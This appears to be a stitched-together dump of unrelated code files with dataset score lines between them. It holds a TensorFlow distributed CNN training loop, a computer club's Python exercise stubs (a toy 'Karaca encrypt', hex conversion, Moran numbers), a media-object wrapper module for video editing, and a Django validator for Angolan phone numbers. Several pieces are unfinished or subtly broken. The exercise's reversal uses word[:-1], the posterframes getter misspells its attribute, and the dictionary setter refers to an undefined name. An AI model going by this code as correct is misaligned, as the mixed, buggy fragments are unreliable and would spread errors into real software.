tf.scalar_summary('accuracy', model_accuracy) merged_summaries = tf.merge_all_summaries() sv = tf.train.Supervisor(is_chief=True, graph=graph, logdir="/tmp/cnn_distributed", init_op=init, global_step=global_step) # Directory to export TensorBoard summary statistics, graph data, etc. TB_DIR = '/tmp/tensorboard/tf_cnn' num_steps = 2000 batch_size = 256 with sv.prepare_or_wait_for_session(target, config=sess_config) as session: writer = tf.train.SummaryWriter(TB_DIR, graph=session.graph) for step in range(num_steps): offset = (step * batch_size) % (train_labels.shape[0] - batch_size) batch_data = train_dataset[offset:(offset + batch_size), :, :, :] batch_labels = train_labels[offset:(offset + batch_size), :] feed_dict = {input_data : batch_data, input_labels : batch_labels} _, l, g_step = session.run( [optimizer, loss, global_step], feed_dict=feed_dict) if step % 50 == 0: print('Minibatch loss at global_step %s: %s' % (g_step, np.mean(l))) test_dict = {input_data : test_dataset, input_labels : test_labels} test_accuracy = session.run(model_accuracy, feed_dict=test_dict) print('Test accuracy: {}'.format(test_accuracy)) writer.close()
2.078125
2
19-10-15-exercises/main.py
stogacs/cscex
0
12771371
<filename>19-10-15-exercises/main.py ''' Conestoga Computer Science Club Programming Challenges Instructions: Finish each method and run the test.py file to test the methods. ''' ''' Karaca Encrypt -------------- Make a function that encrypts a given input with these steps: Input: "apple" Step 1: Reverse the input: "elppa" Step 2: Replace all vowels using the following chart: a => 0 e => 1 i => 2 o => 3 u => 4 # "1lpp0" Step 3: Add "aca" to the end of the word: "1lpp0aca" Output: "1lpp0aca" Examples: encrypt("banana") ➞ "0n0n0baca" encrypt("karaca") ➞ "0c0r0kaca" encrypt("burak") ➞ "k0r3baca" encrypt("alpaca") ➞ "0c0pl0aca" Notes: All inputs are strings, no uppercases and all output must be strings. ''' def karacaEncrypt(word): # Code here map = {"a": "0", "e": "1", "i": "2", "o": "3", "u": "4"} backwords = word[:-1] ''' Convert to Hex Create a function that takes a strings characters as ASCII and returns each characters hexadecimal value as a string. Examples: convert_to_hex("hello world") ➞ "68 65 6c 6c 6f 20 77 6f 72 6c 64" convert_to_hex("Big Boi") ➞ "42 69 67 20 42 6f 69" convert_to_hex("<NAME>") ➞ "4d 61 72 74 79 20 50 6f 70 70 69 6e 73 6f 6e" Notes: Each byte must be seperated by a space. All alpha hex characters must be lowercase. ''' def convertToHex(string): # Code here pass ''' Moran Numbers A Harshad number is a number which is divisible by the sum of its digits. For example, 132 is divisible by 6 (1+3+2). A subset of the Harshad numbers are the Moran numbers. Moran numbers yield a prime when divided by the sum of their digits. For example, 133 divided by 7 (1+3+3) yields 19, a prime. Create a function that takes a number and returns "M" if the number is a Moran number, "H" if it is a (non-Moran) Harshad number, or "Neither". Examples moran(132) ➞ "H" moran(133) ➞ "M" moran(134) ➞ "Neither" Notes: You may need to make a method to determine whether a number is prime. ''' def moran(num): # Code here pass
3.078125
3
turnovertools/mediaobject.py
morganwl/turnovertools
0
12771499
#!/usr/bin/env python3 from abc import ABCMeta import collections.abc class MediaObject(object): """ Parent class for all media objects. Not meant to be instantiated directly. """ __wraps_type__ = type(None) __default_data__ = [] __requires_properties__ = [] @classmethod def wrap_list(cls, data_list, parent=None, **kwargs): """ Wraps a list of data objects using the given MediaObject child class, returning them in a new list. """ mob_list = [] for d in data_list: mob_list.append(cls(d, parent=parent, **kwargs)) return mob_list def __init__(self, data=None, parent=None, **kwargs): """ Instantiate MediaObject with a new data object, or with kwargs. """ self.parent = parent if data is not None: assert isinstance(data, self.__wraps_type__) self.data = data else: self.data = self.__wraps_type__(*self.default_data) for key, val in kwargs.items(): if key in self.__requires_properties__: setattr(self, key, val) else: raise AttributeError('Invalid keyword parameter ' + key) def __setattr__(self, key, value): """ Optionally call a private _on_update method whenever attributes are changed in this object. """ self._on_update(key, value) super(MediaObject, self).__setattr__(key, value) def _on_update(self, key, value): pass class Sequence(MediaObject, collections.abc.Sequence): def __init__(self, data=None, **kwargs): super(Sequence, self).__init__(data=data, **kwargs) self.tracks = [] def __getitem__(self, i): return self.tracks[i] def __len__(self): return len(self.tracks) class SequenceTrack(MediaObject, collections.abc.Sequence): def __init__(self, data=None, **kwargs): super(SequenceTrack, self).__init__(data=data, **kwargs) self.events = [] def __getitem__(self, i): return self.events[i] def __len__(self): return len(self.events) class Event(MediaObject): __requires_properties__ = ['clip_name', 'source_file', 'tape_name'] def get_custom(self, name): raise NotImplementedError() @property def posterframes(self): """Returns a list of posterframes (in record), or rec_start_frame in list form.""" if getattr(self, '_posterframes', None): return self._posterfames return [0] @posterframes.setter def posterframes(self, val): self._posterframes = val; @property def reel(self): if self.tape_name is not None: return self.tape_name return self.source_file @reel.setter def reel(self, val): if self.source_file is not None: self.source_file = val self.tape_name = val class SourceClip(MediaObject): def get_custom(self, name): raise NotImplementedError() @property def reel(self): if self.tape_name is not None: return self.tape_name return self.source_file @reel.setter def reel(self, val): if self.source_file is not None: self.source_file = val self.tape_name = val class Bin(MediaObject): pass class DictWrapperMeta(ABCMeta): def __new__(meta, name, bases, class_dict): lookup = class_dict.get('__lookup__', {}) for prop, target in lookup.items(): if prop not in class_dict: class_dict[prop] = property(meta.getmapper(target), meta.setmapper(target)) cls = type.__new__(meta, name, bases, class_dict) return cls def getmapper(target): def getter(self): return self.data.get(target, None) return getter def setmapper(lookup): def setter(self, val): self.data[target] = val return setter class DictWrapper(object, metaclass=DictWrapperMeta): __wraps_type__ = dict
2.109375
2
vpos/validators.py
txiocoder/django-vpos
3
12771627
<reponame>txiocoder/django-vpos import re from django.core import validators from django.utils.deconstruct import deconstructible from django.utils.translation import gettext_lazy as _ @deconstructible class PhoneAOValidator(validators.RegexValidator): regex = r'^(?:(\+244|00244))?(9)(1|2|3|4|9)([\d]{7,7})$' default_replace = r'\2\3\4' message = _('Invalid national phone number of angola') @classmethod def match(cls, string): return re.match(cls.regex, string) @classmethod def clean_number(cls, phone: str): return re.sub(cls.regex, cls.default_replace, phone) # default PhoneValidator = PhoneAOValidator
1.445313
1